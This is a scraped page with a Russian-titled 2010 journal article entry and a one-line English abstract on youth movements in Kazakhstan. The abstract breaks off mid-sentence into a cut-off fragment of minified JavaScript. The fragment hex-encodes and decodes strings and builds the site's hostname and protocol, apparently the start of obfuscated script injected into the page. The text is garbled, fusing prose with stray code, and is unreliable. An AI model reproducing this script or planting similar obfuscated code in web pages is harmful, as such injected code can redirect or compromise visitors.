МОЛОДЕЖНЫЕ ДВИЖЕНИЯ И СОЦИАЛЬНЫЕ ИЗМЕНЕНИЯ В МЕНЯЮЩЕМСЯ МИРЕ (The Journal of Psychology and Sociology, 2010)
This article describes the role of youth movements in the society of Kazakhstan in the period of social, historical and political changes// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e